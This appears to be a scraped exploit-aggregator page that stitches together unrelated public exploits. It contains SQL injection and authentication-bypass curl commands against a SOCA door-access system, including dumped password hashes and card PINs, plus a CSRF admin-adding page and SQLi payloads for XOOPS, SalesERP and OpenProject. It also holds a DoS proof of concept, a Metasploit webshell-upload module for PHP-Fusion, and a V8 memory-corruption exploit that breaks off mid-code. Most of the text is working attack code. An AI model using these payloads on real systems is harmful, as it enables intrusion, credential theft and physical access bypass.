SOCA Access Control System 180612 SQL Injection And Authentication Bypass
Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007
Summary: The company's products include proximity and fingerprint access
control system, time and attendance, electric locks, card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.
Desc: The Soca web access control system suffers from multiple SQL Injection
vulnerabilities. Input passed via multiple POST parameters is not properly
sanitised before being returned to the user or used in SQL queries. This
can be exploited to manipulate SQL queries by injecting arbitrary SQL code
and bypass the authentication mechanism. It allows the attacker to remotely
disclose password hashes and login with MD5 hash with highest privileges
resulting in unlocking doors and bypass the physical access control in place.
Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
Apache/2.2.22 (Win32)
PHP/5.4.13
Firebird/InterBase DBMS
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5519
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php
20.04.2018
--
Authentication bypass / SQL injection via pos_id POST parameter in Login.php:
-----------------------------------------------------------------------------
-version 141007
# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\
"http://10.0.0.4/Login/Login.php"
HTTP/1.1 200 OK
Date: Fri, 03 May 2018 13:37:25 GMT
Server: Apache/2.2.22 (Win32) PHP/5.4.13
X-Powered-By: PHP/5.4.13
Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5
Content-Type: text/html
true
Authentication bypass / SQL injection via ID POST parameter in Login.php:
=========================================================================
-version 180612
# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\
"http://10.0.0.3/Login/Login.php"
{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php:
=============================================================================
Dump current user:
------------------
# curl -X POST --data "cidx=144 and 1=(user)"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "SYSDBA"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Dump table:
-----------
# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "USERS"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Dump column:
------------
# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "U_NAME"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Dump column:
------------
# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "U_PASSWORD"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Dump username and Idx from USERS table:
---------------------------------------
# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "USER1"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Dump passwords from UAC table:
------------------------------
# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\
"http://10.0.0.3/Card/Card_Edit_GetJson.php"\
-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
Warning: ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17
Login with MD5:
===============
# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng"
"http://10.0.0.3/Login/Login.php"\
{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863591924
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
SOCA Access Control System 180612 CSRF Add Admin Exploit
Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007
Summary: The company's products include Proximity and Fingerprint access
control system, Time and Attendance, Electric Locks, Card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.
Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
Apache/2.2.22 (Win32)
PHP/5.4.13
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5520
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php
20.04.2018
--
<html>
<body>
<script>history.pushState('', 'shpa', '/index-pc.php')</script>
<form action="http://10.0.0.3/Permission/Insert_Permission.php" method="POST">
<input type="hidden" name="Permission" value='{"Idx":null,"Id":"Imposter","Password":"123456","Access":"ffffff00ff00ffffff00"}' />
<input type="submit" value="Forge!" />
</form>
</body>
</html>
SOCA Access Control System 180612 Information Disclosure
Vendor: SOCA Technology Co., Ltd
Product web page: http://www.socatech.com
Affected version: 180612, 170000 and 141007
Summary: The company's products include proximity and fingerprint access
control system, time and attendance, electric locks, card reader and writer,
keyless entry system and other 30 specialized products. All products are
attractively designed with advanced technology in accordance with users'
safety and convenience which also fitted international standard.
Desc: Insecure direct object references occur when an application provides
direct access to objects based on user-supplied input. As a result of this
vulnerability attackers can bypass authorization and access resources and
functionalities in the system.
Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586
Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
Apache/2.2.22 (Win32)
PHP/5.4.13
Firebird/InterBase DBMS
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5517
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php
20.04.2018
--
Authenticated users password hash disclosure via Get_Permissions_From_DB.php:
-----------------------------------------------------------------------------
# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6"
[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}]
Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard:
------------------------------------------------------------------------
# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data "Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat
{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames":
{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling":
1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444",
"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[
{"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"},
{"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"},
{"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"},
{"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"},
{"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"},
{"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"},
{"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"},
{"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"},
{"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"},
{"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"},
{"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"},
{"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"},
{"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"},
{"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"},
{"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"},
{"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"},
{"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"},
{"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"},
{"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"},
{"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"},
{"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"},
{"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"},
{"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"},
{"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"},
{"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"},
{"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"},
{"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"},
{"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"},
...
...
...
phpinfo() disclosure:
---------------------
# curl -s http://10.0.0.3/phpinfo.php
#Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-12
#Vendor Homepage: www.nsauditor.com
#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
#Tested Version: 2.1.8
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
#Steps to produce the crash:
#1.- Run python code: DNSS_2.1.8.py
#2.- Open DNSS.txt and copy content to clipboard
#3.- Open Dnss
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name/Key" paste Clipboard
#6.- Click "Ok"
#7.- Crarshed
cod = "\x41" * 300
f = open('DNSS.txt', 'w')
f.write(cod)
f.close()
[+] Sql Injection on XOOPS CMS v.2.5.9
[+] Date: 12/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://xoops.org/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
[+] Exploit :
http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
[+] EOF
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : customer_id, product_id
# Attack Pattern : %27/**/oR/**/4803139=4803139/**/aNd/**/%276199%27=%276199
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/product_by_search?product_id=99999999[SQL
Inject Here]
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: SalesERP v.8.1 SQL Inj.
# Dork: N/A
# Date: 13-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/category/php-scripts?term=sales%20erp
# Version: v8.1
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ERP is a Modern and responsvie small Business
management system.
It is developed by PHP and Codeginiter framework. It is design and develop
for thinking shop,
small business, company and any types of business.Here has accounting,
management, invoice,user and data analysis.
===========================================================================================
# POC - SQLi
# Parameters : supplier_name
# Attack Pattern : 1260781%27 oR
if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
# POST Method :
http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT
INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
===========================================================================================
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found: 2019-04-17
by: T. Soo (Office Bangkok)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"OpenProject is the leading open source project management software.
Support your project management process along the entire project
life cycle: From project initiation to closure."
Source: https://www.openproject.org/
Business recommendation:
------------------------
The vendor provides a patch which should be applied immediately.
An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security issues.
Vulnerability overview/description:
-----------------------------------
An SQL injection vulnerability has been identified in the web "activities API".
An unauthenticated attacker could successfully perform an attack to extract
potentially sensitive information from the database if OpenProject is configured
not to require authentication for API access.
Proof of concept:
-----------------
Requesting the following URL will trigger a time delay as a proof of concept
for exploiting the blind SQL injection:
http://<host>/api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777
Vulnerable / tested versions:
-----------------------------
The vulnerability has been identified in OpenProject version 8.3.1 which
was the most current version at the time of discovery.
According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
Older versions (< 5.0.0) are not vulnerable.
Vendor contact timeline:
------------------------
2019-04-30: Contacting vendor through security@openproject.com
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory
Solution:
---------
The vendor provides a patched version 8.3.2 and a security notice with further
information:
https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Thanaphon Soo / @2019
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "PHP-Fusion < 9.03.00 - 'Edit Profile' Remote Code Execution",
'Description' => %q(
This module exploits command execution vulnerability in PHP-Fusion 9.03.00 and prior versions.
It is possible to execute commands in the system with ordinary user authority. No need admin privilage.
There is almost no control in the avatar upload section in the profile edit area.
Only a client-based control working with javascript. (Simple pre-check)
If we do not care about this control, the desired file can be sent to the server via Interception-Proxies.
The module opens the meterpreter session for you by bypassing the controls.
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module
],
'References' =>
[
['URL', 'http://www.pentest.com.tr/exploits/PHP-Fusion-9-03-00-Edit-Profile-Remote-Code-Execution.html'], # Details
['URL', 'https://www.php-fusion.co.uk'],
['URL', 'https://github.com/php-fusion/PHP-Fusion/commit/943432028b9e674433bb3f2a128b2477134110e6']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "May 11 2019",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, "Base PHP-Fusion directory path", '/']),
OptString.new('USERNAME', [true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [true, "Password to authenticate with", ''])
]
)
end
def exec
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "images","avatars", "#{@shell}") # shell url
})
end
##
# Login and cookie information gathering
##
def login(uname, pass, check)
# 1st request to get fusion_token
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "home.php")
})
cookie = res.get_cookies
@fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
# 2nd request to login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'home.php'),
'cookie' => cookie,
'vars_post' => {
'fusion_token' => @fustoken,
'form_id' => 'loginform',
'user_name' => uname,
'user_pass' => pass,
'login' => ''
}
)
cookie = res.get_cookies
location = res.redirection.to_s
if res && res.code == 302 && location.include?('login.php?error')
fail_with(Failure::NoAccess, "Authentication was unsuccessful with user: #{uname}")
else
return cookie
end
return nil
end
##
# Upload malicious file // payload integration
##
def upload_shell(cookie, check)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "edit_profile.php"),
'cookie' => cookie
})
ncookie = cookie + " " + res.get_cookies # gathering all cookie information
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "edit_profile.php"),
'cookie' => ncookie
})
# fetch some necessary post data informations
fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
userhash = res.body.split("userhash' value='")[1].split("' style")[0]
usermail = res.body.split("user_email' value='")[1].split("' >")[0]
# data preparation to delete priv avatar
delete = Rex::MIME::Message.new
delete.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
delete.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
delete.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
delete.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
delete.add_part('1', nil, nil, 'form-data; name="delAvatar"')
delete.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
delete.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
delete.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
deld = delete.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => deld,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{delete.bound}",
'cookie' => ncookie,
'uri' => normalize_uri(target_uri.path, "edit_profile.php")
})
# priv avatar deleted.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "edit_profile.php"),
'cookie' => cookie
})
ncookie = cookie + " " + res.get_cookies # recheck cookies
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "edit_profile.php"),
'cookie' => ncookie
})
# They changed. fetch again...
fustoken = res.body.split("fusion_token' value='")[1].split("' />")[0]
userid = res.body.split("profile.php?lookup=")[1].split('"><i class=')[0]
userhash = res.body.split("userhash' value='")[1].split("' style")[0]
usermail = res.body.split("user_email' value='")[1].split("' >")[0]
# The "php" string must be removed for bypass.We can use "<?"
pay = payload.encoded.split("/**/")[1]
fname = Rex::Text.rand_text_alpha_lower(8) + ".php"
@shell = "#{fname}"
# data preparation to upload new avatar
pdata = Rex::MIME::Message.new
pdata.add_part("#{fustoken}", nil, nil, 'form-data; name="fusion_token"')
pdata.add_part('userfieldsform', nil, nil, 'form-data; name="form_id"')
pdata.add_part("#{datastore['USERNAME']}", nil, nil, 'form-data; name="user_name"')
pdata.add_part("#{usermail}", nil, nil, 'form-data; name="user_email"')
pdata.add_part('1', nil, nil, 'form-data; name="delAvatar"')
pdata.add_part("<?" + pay, 'image/png', nil, "form-data; name=\"user_avatar\"; filename=\"#{fname}\"")
pdata.add_part("#{userid}", nil, nil, 'form-data; name="user_id"')
pdata.add_part("#{userhash}", nil, nil, 'form-data; name="user_hash"')
pdata.add_part('Update Profile', nil, nil, 'form-data; name="update_profile"')
data = pdata.to_s
res = send_request_cgi({
'method' => 'POST',
'data' => data,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{pdata.bound}",
'cookie' => ncookie,
'uri' => normalize_uri(target_uri.path, "edit_profile.php")
})
location = res.redirection.to_s
if res && res.code == 302 && location.include?('error')
fail_with(Failure::NoAccess, 'Error occurred during uploading!')
else
print_status("Trying to upload #{fname}")
return true
end
end
##
# Exploit controls and information
##
def exploit
cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_good("Authentication was successful with user: #{datastore['USERNAME']}")
if upload_shell(cookie, true)
print_good("Control was bypassed. Harmful file upload successfully!")
exec
end
end
##
# The end of the adventure (o_O) // AkkuS
##
end
<!--
Since commit https://chromium.googlesource.com/v8/v8.git/+/c22bb466d8934685d897708119543d099b9d2a9a turbofan supports inlining calls to array.includes and array.indexOf. The logic of the function is roughly:
1. Check the set of possible Maps of the array type (with NodeProperties::InferReceiverMaps).
2. If they are all fast arrays, find the correct CSA builtin to handle the fast path (`Callable const callable = search_variant == SearchVariant::kIndexOf ? GetCallableForArrayIndexOf(kind, isolate()) : GetCallableForArrayIncludes(kind, isolate());`).
3. Load the array length and call the builtin. The builtin will assume that the array is a FastArray with packed (dense) elements and directly search linearly through the backing memory.
The issue here is that NodeProperties::InferReceiverMaps doesn't necessarily guarantee that the object will always have the inferred Map. In case it can't prove that the objects will always have the inferred Maps it will return kUnreliableReceiverMaps:
// Walks up the {effect} chain to find a witness that provides map
// information about the {receiver}. Can look through potentially
// side effecting nodes.
enum InferReceiverMapsResult {
kNoReceiverMaps, // No receiver maps inferred.
kReliableReceiverMaps, // Receiver maps can be trusted.
kUnreliableReceiverMaps // Receiver maps might have changed (side-effect),
// but instance type is reliable.
};
static InferReceiverMapsResult InferReceiverMaps(
JSHeapBroker* broker, Node* receiver, Node* effect,
ZoneHandleSet<Map>* maps_return);
In which case the caller is responsible for guarding any optimizations based on the inferred Maps (e.g. by adding MapChecks). However, in this case the calling function fails to do so. As such, if the array is changed to dictionary mode before the inlined function call, the CSA builtin will read data out-of-bounds.
The following sample, found through fuzzing, triggers this case:
function v7(v8,v11) {
function v14(v15,v16) { }
// Transition to dictionary mode in the final invocation.
const v17 = v11.__defineSetter__(v8, v14);
// Will then read OOB.
const v18 = v11.includes(1234);
return v18;
}
v7([], []);
v7([], []);
%OptimizeFunctionOnNextCall(v7);
v7([], []);
const v57 = v7(String(0x1000000), []);
Note: the commit introducing this vulnerability does not appear to be included in the stable Chrome release yet.
-->
<script>
var conv_ab = new ArrayBuffer(8);
var conv_f64 = new Float64Array(conv_ab);
var conv_u64 = new BigUint64Array(conv_ab);
BigInt.prototype.to_float = function() {
conv_u64[0] = this;
return conv_f64[0];
};
BigInt.prototype.hex = function() {
return '0x'+this.toString(16);
};
Number.prototype.to_int = function() {
conv_f64[0] = this;
return conv_u64[0];
}
Number.prototype.hex = function() {
return this.to_int().hex();
}
let ab = undefined;
function leak(i, smi_arr, float_arr) {
let high_bytes = 0;
smi_arr.__defineSetter__(i, ()=>{});
ab = new ArrayBuffer(2<<26);
let smi_boundary = [1, 1, 1, 1];
for (high_bytes = 0; high_bytes < 0xffff; high_bytes++) {
smi_boundary[0] = high_bytes;
let idx = smi_arr.indexOf(high_bytes, 20);
if (idx == 20) {
break;
}
}
float_arr.__defineSetter__(i, ()=>{});
let tmp = new Uint32Array(ab);
let float_boundary = [1.1, 1.1, 1.1, 1.1];
let start = (BigInt(high_bytes)<<32n).to_float();
let end = ((BigInt(high_bytes)<<32n)+0x1000000n).to_float();
let step = 0x1000n.to_float();
for (let j = start; j < end; j += step) {
float_boundary[0] = j;
if (float_arr.indexOf(j, 30) == 30) {
return [j, smi_boundary, float_boundary, tmp];
}
}
}
for (let i = 0; i < 10; i++) {
leak('', [1], [1.1]);
}
let res = leak('100000', [1], [1.1]);
if (res == undefined) {
location.reload();
return;
}
let ab_addr = res[0].to_int();
console.log(`Buf at ${ab_addr.hex()}`);
let u64 = new BigUint64Array(ab);
function write_map(offset, type) {
u64[offset/8n + 0x0n] = 0x12345n;
u64[offset/8n + 0x1n] = 0x190000002900a804n | (type << 32n);
u64[offset/8n + 0x2n] = 0x92003ffn; // bitfield 3
